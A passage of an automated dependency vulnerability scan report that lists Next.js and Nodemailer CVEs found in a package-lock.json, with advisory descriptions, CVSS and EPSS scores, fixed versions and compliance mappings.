https://github.com/vercel/next.js/releases/tag/v16.1.7 - https://github.com/vercel/next.js/security/advisories/GHSA-ggv3-7p47-pfv8 - https://nvd.nist.gov/vuln/detail/CVE-2026-29057 - https://www.cve.org/CVERecord?id=CVE-2026-29057 PublishedDate: '2026-03-18T01:16:05.443Z' LastModifiedDate: '2026-03-18T19:49:19.633Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 13.349866666666665 epss: 0.00031 epss_percentile: 0.0913 is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.00124 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: e4364d984e862d8f ruleId: CVE-2026-44576 severity: MEDIUM tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: Next.js vulnerable to cache poisoning in React Server Component responses title: CVE-2026-44576 description: Next.js is a React framework for building full-stack web applications. From 14.2.0 to before 15.5.16 and 16.2.5, applications using React Server Components can be vulnerable to cache poisoning when shared caches do not correctly partition response variants. Under affected conditions, an attacker can cause an RSC response to be served from the original URL and poison shared cache entries so later visitors receive component payloads instead of the expected HTML. This vulnerability is fixed in 15.5.16 and 16.2.5. remediation: https://avd.aquasec.com/nvd/cve-2026-44576 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id037 - CWE-436 raw: VulnerabilityID: CVE-2026-44576 VendorIDs: - GHSA-wfc6-r584-vfw7 PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 15.5.16, 16.2.5 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44576 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:3c9e2e46b20aad817d3abe8e7abd455ede89a3c4d8a51dc478704b39dba080bb Title: Next.js vulnerable to cache poisoning in React Server Component responses Description: Next.js is a React framework for building full-stack web applications. From 14.2.0 to before 15.5.16 and 16.2.5, applications using React Server Components can be vulnerable to cache poisoning when shared caches do not correctly partition response variants. Under affected conditions, an attacker can cause an RSC response to be served from the original URL and poison shared cache entries so later visitors receive component payloads instead of the expected HTML. This vulnerability is fixed in 15.5.16 and 16.2.5. Severity: MEDIUM CweIDs: *id037 VendorSeverity: ghsa: 2 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:L V3Score: 5.4 References: - https://github.com/vercel/next.js - https://github.com/vercel/next.js/releases/tag/v15.5.16 - https://github.com/vercel/next.js/releases/tag/v16.2.5 - https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7 - https://nvd.nist.gov/vuln/detail/CVE-2026-44576 PublishedDate: '2026-05-13T17:16:23.04Z' LastModifiedDate: '2026-05-14T13:44:18.27Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 13.341866666666666 epss: 0.00016 epss_percentile: 0.03853 is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.00064 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4721ee25bf757892 ruleId: CVE-2026-44577 severity: MEDIUM tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: Next.js has a Denial of Service in the Image Optimization API title: CVE-2026-44577 description: Next.js is a React framework for building full-stack web applications. From 10.0.0 to before 15.5.16 and 16.2.5, when self-hosting Next.js with the default image loader, the Image Optimization API fetches local images entirely into memory without enforcing a maximum size limit. An attacker could cause out-of-memory conditions by requesting large local assets from the /_next/image endpoint that match the images.localPatterns configuration (by default, all patterns are allowed). This vulnerability is fixed in 15.5.16 and 16.2.5. remediation: https://avd.aquasec.com/nvd/cve-2026-44577 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id038 - CWE-770 raw: VulnerabilityID: CVE-2026-44577 VendorIDs: - GHSA-h64f-5h5j-jqjh PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 15.5.16, 16.2.5 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44577 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:9f08da120547fe06a6ff340ef05ca8e057af610a1e77041d7d119d2cea50fca0 Title: Next.js has a Denial of Service in the Image Optimization API Description: Next.js is a React framework for building full-stack web applications. From 10.0.0 to before 15.5.16 and 16.2.5, when self-hosting Next.js with the default image loader, the Image Optimization API fetches local images entirely into memory without enforcing a maximum size limit. An attacker could cause out-of-memory conditions by requesting large local assets from the /_next/image endpoint that match the images.localPatterns configuration (by default, all patterns are allowed). This vulnerability is fixed in 15.5.16 and 16.2.5. Severity: MEDIUM CweIDs: *id038 VendorSeverity: ghsa: 2 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 5.9 References: - https://github.com/vercel/next.js - https://github.com/vercel/next.js/releases/tag/v15.5.16 - https://github.com/vercel/next.js/releases/tag/v16.2.5 - https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh - https://nvd.nist.gov/vuln/detail/CVE-2026-44577 PublishedDate: '2026-05-13T17:16:23.173Z' LastModifiedDate: '2026-05-13T20:00:59.993Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 13.342933333333333 epss: 0.00018 epss_percentile: 0.0459 is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.00072 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 550fe8bea52b0c14 ruleId: CVE-2026-44580 severity: MEDIUM tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: Next.js has cross-site scripting in beforeInteractive scripts with untrusted input title: CVE-2026-44580 description: Next.js is a React framework for building full-stack web applications. From 13.0.0 to before 15.5.16 and 16.2.5, applications that use beforeInteractive scripts together with untrusted content can be vulnerable to cross-site scripting. In affected versions, serialized script content was not escaped safely before being embedded into the document, which could allow attacker-controlled input to break out of the intended script context and execute arbitrary JavaScript in a visitor's browser. This vulnerability is fixed in 15.5.16 and 16.2.5. remediation: https://avd.aquasec.com/nvd/cve-2026-44580 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id039 - CWE-79 raw: VulnerabilityID: CVE-2026-44580 VendorIDs: - GHSA-gx5p-jg67-6x7h PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 15.5.16, 16.2.5 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44580 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:271ac03a6853a4a85c0ed6629628a269cc75c889ec605033b36b7d5a63fe43fb Title: Next.js has cross-site scripting in beforeInteractive scripts with untrusted input Description: Next.js is a React framework for building full-stack web applications. From 13.0.0 to before 15.5.16 and 16.2.5, applications that use beforeInteractive scripts together with untrusted content can be vulnerable to cross-site scripting. In affected versions, serialized script content was not escaped safely before being embedded into the document, which could allow attacker-controlled input to break out of the intended script context and execute arbitrary JavaScript in a visitor's browser. This vulnerability is fixed in 15.5.16 and 16.2.5. Severity: MEDIUM CweIDs: *id039 VendorSeverity: ghsa: 2 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N V3Score: 6.1 References: - https://github.com/vercel/next.js - https://github.com/vercel/next.js/releases/tag/v15.5.16 - https://github.com/vercel/next.js/releases/tag/v16.2.5 - https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h - https://nvd.nist.gov/vuln/detail/CVE-2026-44580 PublishedDate: '2026-05-13T18:16:18.26Z' LastModifiedDate: '2026-05-14T18:33:34.17Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: owaspTop10_2021: - A03:2021 cweTop25_2024: - id: CWE-79 rank: 1 category: Injection cisControlsV8_1: *id010 nistCsf2_0: - &id041 function: DETECT category: DE.CM subcategory: DE.CM-8 description: Vulnerability scans are performed - *id011 - *id012 pciDss4_0: - &id042 requirement: 6.2.4 description: Prevent XSS attacks in bespoke software priority: CRITICAL - *id013 - *id014 mitreAttack: - &id043 tactic: Initial Access technique: T1190 techniqueName: Exploit Public-Facing Application subtechnique: '' subtechniqueName: '' - *id015 priority: priority: 13.339733333333335 epss: 0.00012 epss_percentile: 0.01845 is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.00048 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ffcab1bb08bb5e14 ruleId: CVE-2026-44581 severity: MEDIUM tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: Next.js vulnerable to cross-site scripting in App Router applications using CSP nonces title: CVE-2026-44581 description: Next.js is a React framework for building full-stack web applications. From 13.4.0 to before 15.5.16 and 16.2.5, App Router applications that rely on CSP nonces can be vulnerable to stored cross-site scripting when deployed behind shared caches. In affected versions, malformed nonce values derived from request headers could be reflected into rendered HTML in an unsafe way, allowing an attacker to poison cached responses and cause script execution for later visitors. This vulnerability is fixed in 15.5.16 and 16.2.5. remediation: https://avd.aquasec.com/nvd/cve-2026-44581 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id040 - CWE-79 raw: VulnerabilityID: CVE-2026-44581 VendorIDs: - GHSA-ffhc-5mcf-pf4q PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 15.5.16, 16.2.5 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44581 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:6f2ba23fa5d8ac9fe972f5c6d8249e305d739b420e200ac40e762626f914dc86 Title: Next.js vulnerable to cross-site scripting in App Router applications using CSP nonces Description: Next.js is a React framework for building full-stack web applications. From 13.4.0 to before 15.5.16 and 16.2.5, App Router applications that rely on CSP nonces can be vulnerable to stored cross-site scripting when deployed behind shared caches. In affected versions, malformed nonce values derived from request headers could be reflected into rendered HTML in an unsafe way, allowing an attacker to poison cached responses and cause script execution for later visitors. This vulnerability is fixed in 15.5.16 and 16.2.5. Severity: MEDIUM CweIDs: *id040 VendorSeverity: ghsa: 2 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N V3Score: 4.7 References: - https://github.com/vercel/next.js - https://github.com/vercel/next.js/releases/tag/v15.5.16 - https://github.com/vercel/next.js/releases/tag/v16.2.5 - https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q - https://nvd.nist.gov/vuln/detail/CVE-2026-44581 PublishedDate: '2026-05-13T18:16:18.4Z' LastModifiedDate: '2026-05-14T18:30:24.34Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: owaspTop10_2021: - A03:2021 cweTop25_2024: - id: CWE-79 rank: 1 category: Injection cisControlsV8_1: *id010 nistCsf2_0: - *id041 - *id011 - *id012 pciDss4_0: - *id042 - *id013 - *id014 mitreAttack: - *id043 - *id015 priority: priority: 13.352000000000002 epss: 0.00035 epss_percentile: 0.10495 is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0014 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f36c532127e73145 ruleId: CVE-2025-32421 severity: LOW tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'next.js: Next.js Race Condition to Cache Poisoning' title: CVE-2025-32421 description: 'Next.js is a React framework for building full-stack web applications. Versions prior to 14.2.24 and 15.1.6 have a race-condition vulnerability. This issue only affects the Pages Router under certain misconfigurations, causing normal endpoints to serve `pageProps` data instead of standard HTML. This issue was patched in versions 15.1.6 and 14.2.24 by stripping the `x-now-route-matches` header from incoming requests. Applications hosted on Vercel''s platform are not affected by this issue, as the platform does not cache responses based solely on `200 OK` status without explicit `cache-control` headers. Those who self-host Next.js deployments and are unable to upgrade immediately can mitigate this vulnerability by stripping the `x-now-route-matches` header from all incoming requests at the content development network and setting `cache-control: no-store` for all responses under risk. The maintainers of Next.js strongly recommend only caching responses with explicit cache-control headers.' remediation: https://avd.aquasec.com/nvd/cve-2025-32421 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id044 - CWE-362 raw: VulnerabilityID: CVE-2025-32421 VendorIDs: - GHSA-qpjv-v59x-3qc4 PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 14.2.24, 15.1.6 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-32421 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:64a9f428dd88df3e06576561410dff61f0fec0914799e7cfd4827204eba10d1b Title: 'next.js: Next.js Race Condition to Cache Poisoning' Description: 'Next.js is a React framework for building full-stack web applications. Versions prior to 14.2.24 and 15.1.6 have a race-condition vulnerability. This issue only affects the Pages Router under certain misconfigurations, causing normal endpoints to serve `pageProps` data instead of standard HTML. This issue was patched in versions 15.1.6 and 14.2.24 by stripping the `x-now-route-matches` header from incoming requests. Applications hosted on Vercel''s platform are not affected by this issue, as the platform does not cache responses based solely on `200 OK` status without explicit `cache-control` headers. Those who self-host Next.js deployments and are unable to upgrade immediately can mitigate this vulnerability by stripping the `x-now-route-matches` header from all incoming requests at the content development network and setting `cache-control: no-store` for all responses under risk. The maintainers of Next.js strongly recommend only caching responses with explicit cache-control headers.' Severity: LOW CweIDs: *id044 VendorSeverity: ghsa: 1 redhat: 1 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N V3Score: 3.7 redhat: V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N V3Score: 3.7 References: - https://access.redhat.com/security/cve/CVE-2025-32421 - https://github.com/vercel/next.js - https://github.com/vercel/next.js/security/advisories/GHSA-qpjv-v59x-3qc4 - https://nvd.nist.gov/vuln/detail/CVE-2025-32421 - https://vercel.com/changelog/cve-2025-32421 - https://www.cve.org/CVERecord?id=CVE-2025-32421 PublishedDate: '2025-05-14T23:15:47.87Z' LastModifiedDate: '2025-09-10T15:16:10.053Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: cweTop25_2024: - id: CWE-362 rank: 21 category: Race Condition cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 6.867200000000001 epss: 0.00752 epss_percentile: 0.73386 is_kev: false kev_due_date: null components: severity_score: 2 epss_multiplier: 1.03008 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 1ce95f8bcd69d427 ruleId: CVE-2025-48068 severity: LOW tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'next.js: Information exposure in Next.js dev server due to lack of origin verification' title: CVE-2025-48068 description: Next.js is a React framework for building full-stack web applications. In versions starting from 13.0 to before 14.2.30 and 15.0.0 to before 15.2.2, Next.js may have allowed limited source code exposure when the dev server was running with the App Router enabled. The vulnerability only affects local development environments and requires the user to visit a malicious webpage while npm run dev is active. This issue has been patched in versions 14.2.30 and 15.2.2. remediation: https://avd.aquasec.com/nvd/cve-2025-48068 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id045 - CWE-1385 raw: VulnerabilityID: CVE-2025-48068 VendorIDs: - GHSA-3h52-269p-cp9r PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 15.2.2, 14.2.30 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-48068 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:69e57f7a20f65a73ee7bd893aee36db195599076d8c92184edf8fe2c2707d9a6 Title: 'next.js: Information exposure in Next.js dev server due to lack of origin verification' Description: Next.js is a React framework for building full-stack web applications. In versions starting from 13.0 to before 14.2.30 and 15.0.0 to before 15.2.2, Next.js may have allowed limited source code exposure when the dev server was running with the App Router enabled. The vulnerability only affects local development environments and requires the user to visit a malicious webpage while npm run dev is active. This issue has been patched in versions 14.2.30 and 15.2.2. Severity: LOW CweIDs: *id045 VendorSeverity: ghsa: 1 nvd: 2 redhat: 2 CVSS: ghsa: V40Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N V40Score: 2.3 nvd: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N V3Score: 4.3 redhat: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N V3Score: 4.3 References: - https://access.redhat.com/security/cve/CVE-2025-48068 - https://github.com/vercel/next.js - https://github.com/vercel/next.js/security/advisories/GHSA-3h52-269p-cp9r - https://nvd.nist.gov/vuln/detail/CVE-2025-48068 - https://vercel.com/changelog/cve-2025-48068 - https://www.cve.org/CVERecord?id=CVE-2025-48068 PublishedDate: '2025-05-30T04:15:48.51Z' LastModifiedDate: '2025-09-10T15:17:38.677Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 6.693600000000001 epss: 0.00101 epss_percentile: 0.2732 is_kev: false kev_due_date: null components: severity_score: 2 epss_multiplier: 1.00404 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: e32b41f01db1c199 ruleId: CVE-2026-44572 severity: LOW tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: Next.js's Middleware / Proxy redirects can be cache-poisoned title: CVE-2026-44572 description: Next.js is a React framework for building full-stack web applications. From 12.2.0 to before 15.5.16 and 16.2.5, an external client could send a x-nextjs-data header on a normal request to a path handled by middleware that returns a redirect. When that happened, the middleware/proxy could treat the request as a data request and replace the standard Location redirect header with the internal x-nextjs-redirect header. Browsers do not follow x-nextjs-redirect, so the response became an unusable redirect for normal clients. If the application was deployed behind a CDN or reverse proxy that caches 3xx responses without varying on this header, a single attacker request could poison the cached redirect response for the affected path. Subsequent visitors could then receive a cached redirect response without a Location header, causing a denial of service for that redirect path until the cache entry expired or was purged. This vulnerability is fixed in 15.5.16 and 16.2.5. remediation: https://avd.aquasec.com/nvd/cve-2026-44572 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id046 - CWE-349 raw: VulnerabilityID: CVE-2026-44572 VendorIDs: - GHSA-3g8h-86w9-wvmq PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 15.5.16, 16.2.5 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44572 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:7a874ea313c88fdfc018ce40fae507cbe374abff06d472b78d118b05b82c32ac Title: Next.js's Middleware / Proxy redirects can be cache-poisoned Description: Next.js is a React framework for building full-stack web applications. From 12.2.0 to before 15.5.16 and 16.2.5, an external client could send a x-nextjs-data header on a normal request to a path handled by middleware that returns a redirect. When that happened, the middleware/proxy could treat the request as a data request and replace the standard Location redirect header with the internal x-nextjs-redirect header. Browsers do not follow x-nextjs-redirect, so the response became an unusable redirect for normal clients. If the application was deployed behind a CDN or reverse proxy that caches 3xx responses without varying on this header, a single attacker request could poison the cached redirect response for the affected path. Subsequent visitors could then receive a cached redirect response without a Location header, causing a denial of service for that redirect path until the cache entry expired or was purged. This vulnerability is fixed in 15.5.16 and 16.2.5. Severity: LOW CweIDs: *id046 VendorSeverity: ghsa: 1 nvd: 2 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L V3Score: 3.7 nvd: V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 5.9 References: - https://github.com/vercel/next.js - https://github.com/vercel/next.js/releases/tag/v15.5.16 - https://github.com/vercel/next.js/releases/tag/v16.2.5 - https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq - https://nvd.nist.gov/vuln/detail/CVE-2026-44572 PublishedDate: '2026-05-13T16:16:58.8Z' LastModifiedDate: '2026-05-15T15:46:08.98Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 6.6688 epss: 8.0e-05 epss_percentile: 0.00741 is_kev: false kev_due_date: null components: severity_score: 2 epss_multiplier: 1.00032 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f3c2cbad0f8c4f0a ruleId: CVE-2026-44582 severity: LOW tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: Next.js vulnerable to cache poisoning via collisions in React Server Component cache-busting title: CVE-2026-44582 description: Next.js is a React framework for building full-stack web applications. From 13.4.6 to before 15.5.16 and 16.2.5, React Server Component responses can be vulnerable to cache poisoning in deployments that rely on shared caches with insufficient response partitioning. In affected conditions, collisions in the _rsc cache-busting value can allow an attacker to poison cache entries so users receive the wrong response variant for a given URL. This vulnerability is fixed in 15.5.16 and 16.2.5. remediation: https://avd.aquasec.com/nvd/cve-2026-44582 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id047 - CWE-328 raw: VulnerabilityID: CVE-2026-44582 VendorIDs: - GHSA-vfv6-92ff-j949 PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 15.5.16, 16.2.5 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44582 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:5355cf71971ed497dc9db80439cbc15aecaca5f44147444b410ea52d3870a09d Title: Next.js vulnerable to cache poisoning via collisions in React Server Component cache-busting Description: Next.js is a React framework for building full-stack web applications. From 13.4.6 to before 15.5.16 and 16.2.5, React Server Component responses can be vulnerable to cache poisoning in deployments that rely on shared caches with insufficient response partitioning. In affected conditions, collisions in the _rsc cache-busting value can allow an attacker to poison cache entries so users receive the wrong response variant for a given URL. This vulnerability is fixed in 15.5.16 and 16.2.5. Severity: LOW CweIDs: *id047 VendorSeverity: ghsa: 1 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N V3Score: 3.7 References: - https://github.com/vercel/next.js - https://github.com/vercel/next.js/releases/tag/v15.5.16 - https://github.com/vercel/next.js/releases/tag/v16.2.5 - https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949 - https://nvd.nist.gov/vuln/detail/CVE-2026-44582 PublishedDate: '2026-05-13T18:16:19.037Z' LastModifiedDate: '2026-05-14T18:15:03.26Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: owaspTop10_2021: - A02:2021 cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 6.671999999999999 epss: 0.0002 epss_percentile: 0.05498 is_kev: false kev_due_date: null components: severity_score: 2 epss_multiplier: 1.0008 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 44b697423f0e8861 ruleId: CVE-2025-14874 severity: HIGH tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'nodemailer: Nodemailer: Denial of service via crafted email address header' title: CVE-2025-14874 description: A flaw was found in Nodemailer. This vulnerability allows a denial of service (DoS) via a crafted email address header that triggers infinite recursion in the address parser. remediation: https://avd.aquasec.com/nvd/cve-2025-14874 references: [] tags: - vulnerability - pkg:nodemailer@6.10.1 risk: cwe: &id048 - CWE-703 raw: VulnerabilityID: CVE-2025-14874 VendorIDs: - GHSA-rcmh-qjqh-p98v PkgID: nodemailer@6.10.1 PkgName: nodemailer PkgIdentifier: PURL: pkg:npm/nodemailer@6.10.1 UID: c243d03ecfce3c20 InstalledVersion: 6.10.1 FixedVersion: 7.0.11 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-14874 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:966cf7be028923c9a0026859ad211dbe6884c63fd7e0af1c79f4c19409cbe98a Title: 'nodemailer: Nodemailer: Denial of service via crafted email address header' Description: A flaw was found in Nodemailer. This vulnerability allows a denial of service (DoS) via a crafted email address header that triggers infinite recursion in the address parser. Severity: HIGH CweIDs: *id048 VendorSeverity: ghsa: 3 nvd: 3 redhat: 2 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 nvd: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 redhat: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 References: - https://access.redhat.com/security/cve/CVE-2025-14874 - https://bugzilla.redhat.com/show_bug.cgi?id=2418133 - https://github.com/nodemailer/nodemailer - https://github.com/nodemailer/nodemailer/commit/b61b9c0cfd682b6f647754ca338373b68336a150 - https://github.com/nodemailer/nodemailer/security/advisories/GHSA-rcmh-qjqh-p98v - https://nvd.nist.gov/vuln/detail/CVE-2025-14874 - https://www.cve.org/CVERecord?id=CVE-2025-14874 PublishedDate: '2025-12-18T09:15:44.87Z' LastModifiedDate: '2026-01-08T03:15:43.19Z' context: sbom: name: nodemailer version: 6.10.1 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 23.477999999999998 epss: 0.00155 epss_percentile: 0.3573 is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 1.0062 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8c54dd19fd34e976 ruleId: CVE-2025-13033 severity: MEDIUM tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'nodemailer: Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict' title: CVE-2025-13033 description: A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls. remediation: https://avd.aquasec.com/nvd/cve-2025-13033 references: [] tags: - vulnerability - pkg:nodemailer@6.10.1 risk: cwe: &id049 - CWE-1286 raw: VulnerabilityID: CVE-2025-13033 VendorIDs: - GHSA-mm7p-fcc7-pg87 PkgID: nodemailer@6.10.1 PkgName: nodemailer PkgIdentifier: PURL: pkg:npm/nodemailer@6.10.1 UID: c243d03ecfce3c20 InstalledVersion: 6.10.1 FixedVersion: 7.0.7 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-13033 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:718ace41991afee3a924eee3b40006635632701df5e1f2e2afabf15077a6d79b Title: 'nodemailer: Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict' Description: A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls. Severity: MEDIUM CweIDs: *id049 VendorSeverity: ghsa: 2 redhat: 2 CVSS: ghsa: V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P V40Score: 5.5 redhat: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 